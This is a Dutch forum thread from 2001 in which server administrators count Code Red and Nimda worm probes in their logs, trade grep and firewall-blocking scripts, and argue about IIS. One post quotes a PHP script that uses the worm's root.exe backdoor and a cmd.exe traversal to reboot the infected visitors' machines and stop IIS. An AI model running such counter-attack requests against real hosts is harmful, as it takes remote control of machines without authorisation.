"Happiness is a way of travel, not a destination."
--Roy Goodman
Dat was met Code Red ook zo hoor, heel veel dubbele hosts. Er zijn dus blijkbaar echt veel mensen die een geinfecteerde bak hebben en die het gewoon niet weten. Als je dan naar zo'n pagibna toe gaat is het bijna altijd zo;n standaard IIS gemekker dat die page nog in aanbouw is ofzo...Op woensdag 19 september 2001 16:27 schreef willblack het volgende:
Zijn die getallen wel eerlijk? Elke worm-attack geeft een stuk of wat requests per host ..... 2500 / 5? = 500 effectief?
[deze advertentieruimte is te koop]
Me webserver is nog geen uurtje up en:
bash$ cat access_log | grep cmd.exe | wc -l
24
Leve die microsoft IIS troep
En ook bij mij wordt er regelmatig op de deur geklopt. Gelukkig is er voor die bezoekers niemand thuis
Mijn logs zijn ipv 13 KB, 300 KB. En allemaal wordt er gevraagdt naar
Ik vraag me af wanneer dit voorbij is.00:00:36 212.78.71.91 80 GET /scripts/..%5c../winnt/system32/cmd.exe
ik denk dat dat nog wel eens heeeeel lang kan gaan duren...Op woensdag 19 september 2001 21:52 schreef stokkie het volgende:
Ik vraag me af wanneer dit voorbij is.
want veel van de "slachtoffers" weten niet eens dat ze IIS draaien, dus zullen er ook niet gauw aan denken om te gaan patchen
en de mensen die wel weten dat ze IIS draaien, maar nu nóg niet gepatched hebben, zullen dat ook niet echt vlug gaan doen lijkt me zo
"Happiness is a way of travel, not a destination."
--Roy Goodman
Klopt. Daarom probeer ik altijd een beetje mijn bakkie up-to-date te houden.Op woensdag 19 september 2001 22:11 schreef Flat© het volgende:
[..]
...en de mensen die wel weten dat ze IIS draaien, maar nu nóg niet gepatched hebben, zullen dat ook niet echt vlug gaan doen lijkt me zo
//offtopic
Maar wat me erg opviel na doorlezen van dit topic, is dat veel gebruikers zich enorm ergeren aan IIS (Non-Windows Operating Systems, kweet ut
Verder is IIS gebruikersvriendelijk, wat mij ook wel aanspreekt.
Als er nou eens onderscheid gemaakt wordt tussen de "ietwat ervaren" (waaronder ik
Ik vind ut wel ergerlijk om steeds " IIS
Ik zit toch ook nie te zeuren op Linux/Unix servers
ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device
Maar ja.. zeker voor een server is MS/IIS niet iets wat ik zou doen.. maar ja... iedereen z'n eigen keuze he, zolang je de boel maar goed onderhoud.. en omdat dat MS/IIS zo "makkelijk" is, verdiepen de meesten zich er niet in, en modderen maar wat aan.. gevolg: Virussen die lekker bandbreedte vreten.
"I had a problem, I solved it with regular expressions. Now I have two problems". That's shows a lack of appreciation for regular expressions: "I know have _star_ problems" --Kevlin Henney
Mja, je moet wel toegeven dat IIS wel erg veel lekken heeft, terwijl apache al 2 jaar zonder remote exploit (NB dit betekent niet bugloos) zit (afaik).Op woensdag 19 september 2001 22:27 schreef stokkie het volgende:
Ik vind ut wel ergerlijk om steeds " IIS" of "
IIS gebruikers " te moeten lezen.
Ik zit toch ook nie te zeuren op Linux/Unix servers
Verwijderd
maar het heeft wel /winnt/etc etc alleen geen gevaarlijke commandos op de cmd.exe.
btw de teller staat nu op 1248, en dan zijn die van vandaag niet meegeteld.
vandaag weer 1515 erbij, en dan heb ik het over unieke aanvallen, dus ik zoek op "winnt/system32/cmd.exe".
http://www.microsoft.com/frontpage
[troll]
let the microsoft bashing begin!!!!
[/troll]
There are no stupid questions, but there are a lot of inquisitive idiots.
Dell is ook geinfecteerd trouwens:
http://docs.us.dell.com/docs/systems/pcpxhj/
Een half uur na het melden van deze url op de securitymailinglist 'incidents@bugtraq.org' is de site blijkbaar gepatched
There are no stupid questions, but there are a lot of inquisitive idiots.
Waarom ik dit doe?
- Microsoft is geinfecteerd. Hmm .. wat betekent dit? Dat ze dus een lek OS maken (dat is 1), op hun eigen servers installeren (2) en NIET PATCHEN ALS ER SECURITYPATCHES UITKOMEN (3). Sorry hoor, maar ben ik echt de enige die dit absurd vind?
- Dell, ook een groot bedrijf, ook een website heeft draaien die mensen infecteerd. Dat www.de-bakker-op-de-hoek.nl geinfecteerd is is niet de moeite van het melden waard, maar een site van Dell vind ik toch best een Big Deal.
Als ik dacht dat ik met deze posting mensen zou infecteren had ik het niet geschreven, maar aangezien dit NOS is en de werking van de worm al in 100 voorgaande posts is beschreven vond ik het veilig genoeg.
(URL's komen trouwens van 'incidents@securityfocus.com')
Ook de microsoft machines zijn nu schoon blijkt (alle 4 de microsoft webserver lijken schoon, de javascript-popup code is weg)
There are no stupid questions, but there are a lot of inquisitive idiots.
1) wel alle patches hadden maar toch besmet zijn
2) niet gepatched kunnen worden zonder dat er iets anders breekt.
Het irritante is gewoon dat er verschillende apps zijn (Crystal Reports, FrontRange, GoldMine5.5, VisualBasic6 + Visual.NET(beta2) bijvoorbeeld) die persé IIS services willen activeren/gebruiken.
Mensen die deze programmas gebruiken zijn o.h.a geen serveradmins, en die komen er vaak niet achter dat die services gewoon doorlopen zonder erop geattendeerd te worden.
ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device
Ik vind het ergerlijk om elke dag van windhoos gasten te moeten aanhoren hoe geweeeeeeeeeeeeeeeeeeeeeeeeeeldig ze wel niet ijn want ze hebben ("een aap kan ook op knopjes drukken"Op woensdag 19 september 2001 22:27 schreef stokkie het volgende:
Ik vind ut wel ergerlijk om steeds " IIS" of "
IIS gebruikers " te moeten lezen.
Ik zit toch ook nie te zeuren op Linux/Unix servers
Geweeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeldig
Alsof een aap dat niet kan. Een webserver is meer dan als aap tien keer achter elkaar per ongeluk het juiste knopje vinden. Dat irriteert me aan "de gemiddelde IIS gebruiker". De gemiddelde apache gebruiker heeft in elk geval httpd.conf al eens ge-edit (mag ik hopen), wat er in elk geval op duidt dat ie weet wat er ongeveer gebeurt.....
Even voor de duidelijkheid, geweldig voor je dat je zo'n prachtige webserver hebt, perfect zelfs als je een slimme gebruiker/admin ervan bent.... Maar de "gemiddelde" IIS gebruiker is de "aap die op de juiste knopjes drukte" en geen idee heeft wat ie eigenlijk doet. En van die servers stroomt mijn log voor de zoveelste keer (codered-1, codered2, deze nu weer) vol.
En daar
[no personal flame intended]
Verwijderd
Ik associeer dit soort mensen (de gemiddelde Windhoos gebruiker dus) altijd met de "Computer Idee"
Ik weet het, het is niet netjes, maar ik denk dat ik hierin en op deze plek niet de enige ben. 0-)
[/semi-offtopic]
Wat een bull zeg. ff afgeven op de IIS gebruiker die dom op knopjes drukt. Helaas is dit vaak het geval, ik zie vaak in bedrijven eigen intranetjes e.d. die door het betere klikwerk (=IIS installeren en Frontpage pagina's) in elkaar zijn gezet. Mensen die echter professioneel (=voor hun werk) dynamische intranetten/websites ontwikkelen, weten wel beter en zullen zich niet beperken tot het 'betere klikwerk'.
Het zo ontwerpen van je site (intra- of internet) en het daarbij juist configureren van de webserver is ook op het Windows-platform een vak appart.
Het feit dat jou servers vollopen met request van exploits heeft niets te maken met de 'aap die op de juiste knopjes drukte' maar met het feit dat microsoft een denkfout heeft gemaakt door de IIS standaard mee te installeren. Als je niet weet dat het draait, hoe moet je dan weten dat je er patches voor moet installeren. De betere beheerder is echt wel op de hoogte dat als je een Windhoos doos draait, dat je de patches, fixes en service packs in de gaten moet houden.
* Mart! is aardig afgekoeld door dit verhaal
Net ff wat stats bekeken: veel aanvallen komen van de nl.home.com domeinen, dus vooral de argeloze gebruiker die van niets weet?
Het zal wel niet, maar het zou maar wel.
Verwijderd
11395 Nee, gaat echt lekker
Tja gebruiksvriendelijkheid is inberdaad gewoon de pest voor services.
Ik merk het ook steeds vaker met Linux helaas.
Allemaal heel leuk dat het gebruiksvriendelijker wordt en zo voor de massa aantrekkelijk wordt. Het aantal gebruikers met Linux die zonder dat ze het weten allerlei services draaien neemt echter ook enorm toe. Lang leve de tooltjes alla webmin/linuxconf etc.
Hetzelfde geldt voor IIS. Het is echt maar een paar klikken om dat aan te zetten. Tja dan vind ik het niet zo vreemd, dat er wat leuke wormpjes zo'n systeem binnen dringen zonder dat de persoon het in de gaten heeft of er uberhaupt ooit gaat achter komen.
Op donderdag 20 september 2001 13:54 schreef Mart! het volgende:
Maar daar gaat het juist om!Het feit dat jou servers vollopen met request van exploits heeft niets te maken met de 'aap die op de juiste knopjes drukte' maar met het feit dat microsoft een denkfout heeft gemaakt door de IIS standaard mee te installeren. Als je niet weet dat het draait, hoe moet je dan weten dat je er patches voor moet installeren. De betere beheerder is echt wel op de hoogte dat als je een Windhoos doos draait, dat je de patches, fixes en service packs in de gaten moet houden.
Die "betrere beheerder" weet wel waar die mee bezig is. Maar het gaat mij dus om die weetikveelhoeveel mensen die geen flauw idee hebben waar ze mee bezig zijn. Waarom installeer je dan uberhaupt windows NT/2k-server als je niet weet hoe dat werkt, wat het doet, enzo? (99% kans dat het illegale copien zijn
Als je als beheerder niet doorhebt dat er constant een applicatie aan poort-80 staat te luisteren, be it IIS of een virus/worm, dat vind ik schandelijk. Die mensen zouden nooit van hun hele leven meer een server mogen opzetten! Om die mensen ben ik zo pissed off. Want zij horen geen server te hebben, en al helemaal geen IIS erop. Dat is dus niet alleen (wel gedeeltelijk...) een denkfout van MS om IIS standaard mee te installeren, het is toch vooral dom dat zij uberhaupt een server(tje) hebben.
Een verplichte sysadmincursus bij elke installatie van windowsNT/2k zou helemaal niet zo'n slecht idee zijn
44128
Is dat normaal? zoveel?
Of doe ik iets fout?
op @home en andere (grote) kabel/adsl 24/7 ISPs is dat vrij normaal - die hebben vrij vaak een win2k/nt routertje of servertje ofzo met (zonder het te wetenOp donderdag 20 september 2001 16:03 schreef BigB het volgende:
[root@server httpd]# cat access* | grep cmd.exe | wc -l
44128
Is dat normaal? zoveel?
Of doe ik iets fout?
bash$ cat access_log | grep cmd.exe | wc -l
72
24074
toch meer dan de helft zijn unique
Domme uitspraak ja, maar er zijn wel een hoop mensen die min of meer zo denken, en de meesten daarvan gaan nu hard op hun bek. Het gevolg? Tja.. als je dat niet weet moetje dit topic nog maar es helemaal doorlezen
Ook zijn er genoeg mensen die denken dat ze cool zijn als ze hun eigen web-server hebben draaien.. dat ze niet eens weten hoe ze een patch moeten installeren zal hun een zorg zijn... nogmaals.. het gevolg?? ach ja.
Dit geld zeker voor windows, maar idd ook steeds meer voor linux met bijbehorende "foute" config tooltjes. Als ik een server o.i.d. installeerd gebruik ikzelf linux, en config ALLES met de hand! (= vi /etc/configfiletje etc.) Waarom? Dan weet ik precies wat waar en waarom het draait. Als je daar geen tijd voor hebt en zo snel mogelijk iets wilt laten draaien om "cool" te wezen.. ach ja... als jij denkt dat het "cool" is om een webserver o.i.d. te hebben draaien
"I had a problem, I solved it with regular expressions. Now I have two problems". That's shows a lack of appreciation for regular expressions: "I know have _star_ problems" --Kevlin Henney
Het volgende staat erin:
Hey there... Please patch your IIS. You're infected with the code red virus. This is a 404
300'ste post
* Boomerang trekt de champagne open en schenkt iedereen een glaasje in
op naar de 1000
Verwijderd
Bovenstaand scriptje is veel coolerOp donderdag 20 september 2001 16:53 schreef webleraar het volgende:
/me heeft ff een bestand gemaakt met de naam default.ida en dat is een php bestand
Het volgende staat erin:
Hey there... Please patch your IIS. You're infected with the code red virus. This is a 404
![]()
Huh......Waarom gaat m'n pjoeter nou uit?
Lol, en HOE moet de geinfecteerde dit gaan lezen? Het is immers een programmatje dat dit uitvoerd en geen gebruiken met een browserOp donderdag 20 september 2001 16:53 schreef webleraar het volgende:
* wouzer heeft ff een bestand gemaakt met de naam default.ida en dat is een php bestand
Het volgende staat erin:
Hey there... Please patch your IIS. You're infected with the code red virus. This is a 404
Da weetik ook wel... just 4 funOp donderdag 20 september 2001 17:56 schreef wouzer het volgende:
[..]
Lol, en HOE moet de geinfecteerde dit gaan lezen? Het is immers een programmatje dat dit uitvoerd en geen gebruiken met een browser
inderdaad... maak dan een scriptje daat met behulp van diezelfde exploit een "net send localhost heej eikel je bent geïnfecteerd met de nimda-worm"-scriptOp donderdag 20 september 2001 17:56 schreef wouzer het volgende:
[..]
Lol, en HOE moet de geinfecteerde dit gaan lezen? Het is immers een programmatje dat dit uitvoerd en geen gebruiken met een browser
ik weet niet of 't precies zo moet, maar aan een popup op de geïnfecteerde server heb je in ieder geval meer
"Happiness is a way of travel, not a destination."
--Roy Goodman
Misschien iemand die aan een dergelijk script wil meewerken, het lijkt me namelijk bes wel moeilijk (kannut mis hebben)Op donderdag 20 september 2001 18:12 schreef Flat© het volgende:
[..]
inderdaad... maak dan een scriptje daat met behulp van diezelfde exploit een "net send localhost heej eikel je bent geïnfecteerd met de nimda-worm"-script
ik weet niet of 't precies zo moet, maar aan een popup op de geïnfecteerde server heb je in ieder geval meer
Apache zelf zal vast al wel twee jaar zonder remote exploit door het leven gaan, maar in alle add-on modules zitten zeker zo nu en dan exploits. Laatst weer in een of andere authenticatiemodule, geloof ik.Op woensdag 19 september 2001 23:27 schreef deadinspace het volgende:
[..]
Mja, je moet wel toegeven dat IIS wel erg veel lekken heeft, terwijl apache al 2 jaar zonder remote exploit (NB dit betekent niet bugloos) zit (afaik).
Leven is het meervoud van lef | In order to make an apple pie from scratch, you must first create the universe.
Nee hoor, dat valt nogal mee.Op donderdag 20 september 2001 16:21 schreef BigB het volgende:
[root@server httpd]# cat access_log | grep -i cmd | cut -f1 -d- | uniq | wc -l
24074
toch meer dan de helft zijn unique
Doe maar eens 'cat access_log | grep -i cmd | cut -f1 -d- | sort | uniq | wc -l'
Verwijderd
Useless use of CatOp dinsdag 18 september 2001 17:55 schreef Flat© het volgende:
/me start PuTTY
cat access_log | grep cmd.exe | wc -l
164
grep cmd.exe /access.log | wc -l
6032
grep root.exe /access.log | wc -l
1113
Verwijderd
1.Het kijkt wie cmd.exe heeft geprobeert te benaderen.
2.Het zoekt de bijbehorende naam op.
3.Het tovert die gegevens dan op je scherm.
for i in `grep cmd.exe /var/log/httpd/access_log | cut -d" " -f1 | sort -u`; do host $i | grep pointer | cut -d" " -f5 | sort -d; done | sort
de ip's die geen naam hebben laat 'ie niet zien.
dit script is om te bouwen naar een script wat b.v. je firewall aanstuurt.
als 't nog korter moet:Op vrijdag 21 september 2001 12:51 schreef mich31 het volgende:
Useless use of Cat
grep cmd.exe /access.log | wc -l
6032
grep root.exe /access.log | wc -l
1113
1
| grep -c cmd.exe access_log |
draai jij trouwens windows op je server ofzo, omdat het access.log heet bij jou?
(of een vergissing gemaakt, is niet erg vroeg 't me gewoon af. en over windows op een server, ik bedoel er verder niets mee hoor, maar aangezien files daar vaak een extensie van 3 chars hebben...)
"Happiness is a way of travel, not a destination."
--Roy Goodman
Je bedoelt deze?Op donderdag 20 september 2001 18:33 schreef slierp het volgende:
Voordat aan dat scriptje wordt gewerkt: hadden jullie deze al gezien?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| <? echo "<h2>Shutting down of IIS/WIN2K systems infected with CODE RED</h2><br /><br />this is yet another proof that the windows os sucks ass, so install linux!<br /><br />if your system is not infected this page will do no harm to your system.<br /><br />This script also notify's the owner his pc has been infected before it reboots."; if (getenv(HTTP_X_FORWARDED_FOR)) { $ip = getenv(HTTP_X_FORWARDED_FOR); } else { $ip = getenv(REMOTE_ADDR); } @file('http://'.$ip.'/scripts/root.exe?%2Fc+net+send+%25computername%25+This+machine+has+the+CODE+RED+II+worm%2C+please+shut+down+immediately+and+then+take+appropriate+measures%21%20See%20http%3A%2F%2Fvil.mcafee.com%2FdispVirus.asp%3Fvirus_k%3D99177%26'); @file('http://'.$ip.'/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5'); @file('http://'.$ip.'/scripts/root.exe?/c+iisreset+/stop') ; @file('http://'.$ip.'/scripts/root.exe?/c+iisreset') ; @file('http://'.$ip.'/scripts/../../winnt/system32/cmd.exe/c+iisreset+/stop'); @file('http://'.$ip.'/scripts/../../winnt/system32/cmd.exe/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5'); ?> |
of bedoel je deze ?
1
2
3
4
5
6
7
| #!/bin/sh ipchains -F input ipchains-restore < /www/log/default.rule for i in `cat /www/log/access_log* | grep scripts | grep -v 192.168.1 | cut -d" " -f1 | sort -u` do ipchains -I input -s $i --destination-port 80 -p tcp -l -j DENY done |
Programmer - an organism that turns coffee into software.
Als ik op een geïnfecteerde bak http://IP/scripts/root.exe doe krijg ik mooi een antwoord: file not found
Anti Geluidsmuur Front Amstelveen telt 17.800 lantaarnpalen; hoeveel heeft jouw gemeente?
Verwijderd
Let op de permissies van het bestandje en haar bovenliggende directories!Op vrijdag 21 september 2001 23:21 schreef Vaagharses het volgende:
Mijn grote vraag: werkt dat script wel
Als ik op een geïnfecteerde bak http://IP/scripts/root.exe doe krijg ik mooi een antwoord: file not found
Verder zul je in een .htaccess aan moeten geven dat hij door de php-parser gehaald wordt.
Ten slotte moet je .htaccess ook nog een werken voor die dir (dus niet iets van een "allowOveride none" hebben staan
http://www.arnoldusnet.dhs.org/scripts/root.exe
Maar mijn vraag was meer, doet dit script wat het moet doen
Anti Geluidsmuur Front Amstelveen telt 17.800 lantaarnpalen; hoeveel heeft jouw gemeente?
Keb er duizenden gehad de afgelopen 2 dagen....
Dat terwijl er geen website op draait....
Allemaal /script en cmd.exe enzo....
Verwijderd
Ik weet niet of je nu gewoon nog een keer extra de source-code uitspuugt.Op zaterdag 22 september 2001 00:03 schreef Vaagharses het volgende:
Mijn scriptje doet het keurig:
http://www.arnoldusnet.dhs.org/scripts/root.exe
Maar mijn vraag was meer, doet dit script wat het moet doende andere kant plat gooien
Maar het is dus wel de bedoeling dat het ding door de php-parser heen gaat he
En reken maar dat het ding dan plat zal gaan als hij geinfecteerd is.
http://www.arnoldusnet.dhs.org/root.source
Maar waarom ik me afvroeg of dit werkte: ik had een attack om 22:58 en om 23:00 kon ik het IP gewoon pingen
Anti Geluidsmuur Front Amstelveen telt 17.800 lantaarnpalen; hoeveel heeft jouw gemeente?
Verwijderd
Wordt liever ziek van de beheerderders van de geinfecteerde servers, MS heeft patches uitgebracht en het is de verantwoordelijkheid van de beheerders van de gecopieerde stoere Database Advanced win2k server om die up te daten maarja, als je dom bent en niet weet wat IIS is en dus ook niet weet dat die draait (je bent namelijk win9x n00b en hebt niet meer verstand van win2kADS dan dat het een desktop heeft), dan kun je ook niet updaten en daar komen al die geinfecteerde machines vandaan....Op zaterdag 22 september 2001 01:34 schreef 4of10 het volgende:
Heel irritant ja, ik heb ook nogal veel hits en daar ben ik dus echt niet blij mij. Ik word echt ziek van microsoft!
Verwijderd
Ik heb nu dit:
1
2
3
4
5
6
7
| #!/bin/sh cd /var/log/httpd/ for i in 'cat access_log | grep scripts | cut -d" " -f1 | sort -u'; do iptables -I INPUT -s $i -j DROP; done |
alleen dan werkt niet
1
2
| Bad argument `access_log' Try `iptables -h' or 'iptables --help' for more information. |
Ik heb totaal geen verstand van scripting en heb dit op basis van het scriptje van Wizard_of_OS in elkaar gezet. Misschien dat iemand zou kunnen kijken of dit werkende te krijgen is.
1
| 'cat access_log | grep scripts | cut -d" " -f1 | sort -u |
geeft overigens wel een mooie lijst met IP adressen....
Alvast bedankt.
Path misschien meegeven ,Op zaterdag 22 september 2001 11:50 schreef BlackHawk het volgende:
ik probeer een scriptje te maken wat automagisch hosts die mij scannen (nimda) te blokkeren.
code:
1 'cat access_log | grep scripts | cut -d" " -f1 | sort -u
Geeft overigens wel een mooie lijst met IP adressen....
dus
1
| cat /var/log/apache/access_log | grep scripts | cut -d" " -f1 | sort -u |
God, root, what is difference? | Talga Vassternich | IBM zuigt
nog maar z'n 2 aanvallen per uur
"Happiness is a way of travel, not a destination."
--Roy Goodman
Resultaat: slechts 41 nimda-hits. Beetje Cru maar ja
ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device
24.132 » klinkt als sjelloOp zondag 23 september 2001 13:02 schreef BackSlash32 het volgende:
Ik had bij de tweede week CRII al besloten om alle verkeer van 24.132.x.x te blocken.
Resultaat: slechts 41 nimda-hits. Beetje Cru maar ja
tracert 24.132.1.1 » yup, sjello/upc
tyrips, tywreps, tiewreps, tiereps, tie raps, ripties, taiwraps, kabelbindbandjes » Tie Wraps
\o/
Wat er tegen doen, gewoon het scripje bakken?
Ik heb een Linux server, maar zo thuis ben ik nou ook weer niet in Linux, aldoende leert men toch....?
Laten we weer 's bierbrouwen of gewoon gekke dingen bouwen en knutselen. YEAH!
RIP Lada 2105 "Igor" 31-12-1992 - † 21-02-2014. De nieuwe Igor: Tesla model 3 SR+ 21-08-2020
huhOp woensdag 26 september 2001 13:45 schreef zwahiel het volgende:
Ik heb 'm dus ook!
Wat er tegen doen, gewoon het scripje bakken?
Ik heb een Linux server, maar zo thuis ben ik nou ook weer niet in Linux, aldoende leert men toch....?
Linux is niet infecteerbaar door deze worm, we worden alleen aangevallen door domme IIS servers die in het kader van "alles is MS" denken dat wij ook IIS draaien
En al doende schrijven wij een scriptje die de systeembeheerders van deze IIS machientjes er op de een of andere manier (reboot, e-mailtje) op atent maakt dat hij een worm heeft.
Maar linux of apache heeft nergens last van
cmd.exe 4205
Gullukug is FreeBSD ingeënt tegen kinderziektes